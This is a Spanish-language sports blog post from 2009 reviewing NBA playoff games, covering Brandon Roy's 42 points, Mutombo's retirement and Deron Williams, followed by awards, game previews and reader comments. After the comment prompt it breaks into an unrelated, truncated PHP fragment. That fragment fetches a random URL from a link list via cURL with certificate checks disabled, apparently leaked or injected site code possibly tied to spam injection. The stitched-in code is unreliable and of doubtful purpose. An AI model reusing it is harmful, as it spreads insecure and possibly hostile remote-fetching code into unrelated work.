Playoffs (21/04/2009): A contracorriente

22 de April de 2009 por TheDeerHunter

royao

Por MagicJohnson32 & TheDeerHunter

Se preveía una difícil jornada para los equipos con la eliminatoria en contra ayer y así fue aunque sin llegar a producirse la debacle que podíamos intuir. Los que estaban más contra las cuerdas, los Blazers, lograron un sufrido triunfo, asegurándose de esta forma al menos un partido más en el Rose Garden. Utah y Detroit no lo lograron, pese a que evitaron una paliza, y ahora la eliminatoria viaja a sus dominios. Vayamos por partes.

Los Pistons cayeron a donde al final cae la mayoría: a tratar de parar a garrotazos al Elegido. El truco les funcionó bastante mal y con 32 puntos recibidos desde la línea de tiro libre tenían prácticamente el partido perdido al final del tercer cuarto… si no fue antes. Al menos le echaron narices en el último para maquillar algo el resultado, pero con Prince, Wallace o Kwane Brown arrastrándose por la cancha es difícil hacer nada. LeBron apenas sudó, bien arropado por Mo & West. Dudamos mucho que la eliminatoria vaya a cambiar demasiado con el cambio de escenario.

En Portland se encomendaron nuevamente a Roy a pesar de su amargo primer partido. El chaval estuvo soberbio y, de paso, también pudimos disfrutar de un gran Aldridge. El resto, de palmeros, por aquello de que tienen que haber 5 tipos por equipo para que se juegue el partido. Entre 7 hombres apenas lanzaron algo más a canasta que uno sólo, aunque, al menos, la salida de Oden sirvió para lesionar a un Mutombo que ya se ha despedido del baloncesto profesional: “For me, basketball is over”. Triste aunque habitual final para una carrera tan digna como la del zaireño. No le acertaría a una vaca con un melón a dos metros pero será recordado muchos años como uno de los iconos defensivos de la liga, e incluso con cuarenta y pico de años el hueco que deja en los Rockets va a ser difícil de llenar.

kobescreamLa clave del partido fue detener a Yao, y por ahí sí habría que reconocerle sus méritos a McMillan con la telaraña que tejió en torno a Przibilla. Lo cierto es que el chino tampoco es que se matara por presentar batalla anoche. El objetivo estaba cumplido. Ese tipo de actitud es lo que le falla.

Por último, no es que Utah pusiera el 2º choque en el filo de la navaja pues en ningún momento llegó a peligrar para L.A., pero al menos apretaron y pudimos ver los únicos 3 minutos de buena defensa que han mostrado los angelinos. El partido fue prácticamente clavado al del domingo pero, no nos engañemos, dejando anotar a los Lakers un 60% de sus tiros no puedes evitar quedar en sus manos. Gran partido el protagonizado por Deron y peleón de Boozer&Millsap. Poco más positivo podemos resaltar de ellos. Sus esperanzas pasan por el posible regreso de Okur para el tercero y el efecto de Salt Lake. Pero con esa defensa hay 0 posibilidades de incordiar. Da la sensación que Lakers todavía no han comenzado sus Playoffs. Un poco de Bryant, Pau y Odom resultó suficiente. No será así el jueves en Utah.

PREMIOS

MVP: 42 puntos, con 15 de 27 en tiros de campo, y 7 rebotes de Brandon Roy llevaron a los Blazers a igualar la serie ante los Rockets. Un dato para hacernos una idea de la trascendencia de su actuación: es la segunda mejor marca anotadora jamás conseguida por un jugador de los Blazers en Playoffs.

El rookie: En apenas 19 minutos Rudy consiguió 11 puntos, 2 robos, 1 rebote y 1 asistencia. Los minutos son menos pero el mallorquín no deja de aportar.

La sorpresa: No es ni mucho menos una sorpresa que Aaron Brooks se vaya a 23 puntos. Lo que se escapa del guión es que 11 de ellos llegaron en los últimos 27 segundos de partido. En ese tiempo Brooks anotó 3 triples y un tiro de 2 puntos.

deronstaplesLa decepción: 11 puntos, 3 de 6 en tiros de campo, 8 rebotes, 0 tapones… Yao ha de aportar mucho más para que sus Rockets superen esta difícil primera ronda. Aun el más decepcionante del día juega en los Pistons: 2 puntos de Prince, 1 de 5 en tiros, 3 rebotes, 1 asistencia, sin robos ni tapones y un -17 de parcial para su equipo con el en cancha.

El mayor esfuerzo en vano: Dirige y anota, y por mucho que su equipo no acompañe sigue siendo un placer ver a Deron Williams. Anoche anotó 35 puntos, incluyendo 6 triples, repartió 9 asistencias, recuperó 4 balones y atrapó 4 rebotes. Ni Fisher ni Brown supieron frenarlo. De hecho ¿sabe alguien?

Y la próxima madrugada…

– Sixers @ Orlando (1.00 h). Los Magic necesitan ganar y hacerlo bien para espantar los fantasmas causados por el sorprendente triunfo de los Sixers en el primer partido. Dwight Howard, acabado de seleccionar como Mejor Jugador Defensivo de la temporada, tiene una gran ocasión para reivindicarse.

– Heat @ Atlanta (2.00 h). O Wade vs Su Bestia Negra. De todos modos, no nos engañemos: aunque Wade jugase mal, el ridículo de sus compañeros en el primer partido es intolerable. Jermaine, Haslem, Beasley o el que sea, alguien ha de dar un paso al frente.

– Hornets @ Denver (4.30 h). La exhibición de Billups exige réplica por parte de Chris Paul. Pero, como en el caso anterior, son West, Chandler, Stojakovic o Posey los que han de dar mucho más de sí para sacar algo positivo del Pepsi Center.

Comenta

6 comentarios a esta entrada

  1. El blog de la ÑBA dice:
    #1

    Brooks ya apuntó maneras en el primer encuentro, se le con ganas de liarla. Además, los bases de Portland no son precisamente los defensores del año…

    Menos mal que McMillan leyó mi blog y preparó una defensa especial a Yao jajajjaj

      Citar

  2. Viva_Dirk dice:
    #2

    Poco que añadir, solo comentar como se van acortando cada vez mas las rotaciones, en algunos casos de forma exagerada.

      Citar

  3. MagicJohnson32 dice:
    #3

    Precisamente Phil Jackson dijo ayer tras el partido que la culpa de que los Lakers perdiesen buena parte de la renta fue suya por hacer rotaciones demasiado largas. En otras palabras: Farmar, olvídate de tus 5 minutos, jeje.

      Citar

  4. javi dice:
    #4

    Buenos PO estos!!!

    Sigo flipando con el descubrimiento del tio Phil, Shanon Brown. A este tío no lo conocia ni dios y está aportando muchísimo a los Lakers, no se lía a hacer cosas queno sabe y x lo visto hasta ahora tiene un buen tiro exteror. A día de hoy lo veo incluso en mejor forma que a Fisher al q los años se le van notando. Aunq su experiencia en ultimos tiros seguro que en algún partido será importante.

    Y lo de los Blazers me parece que juegan demasiado en el filo de la navaja. Roy es un jugón eso está claro, pro un equipo no puede depender solo de un tio. Yo me pregunto, ¿y si tiene un mal día?¿y dos?. Ya me imagino a Mcmillan volviendo a las canchas XDDD.

    Lo de ls Cavs no comment, contra estos Pistons nos juntams 5 de aquí y les damos guerra.

    salu2

      Citar

  5. Josep Àngel Colomés dice:
    #5

    Echaremos de menos a Mutombo!

      Citar

  6. Txusma dice:
    #6

    Ese dedito al aire…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>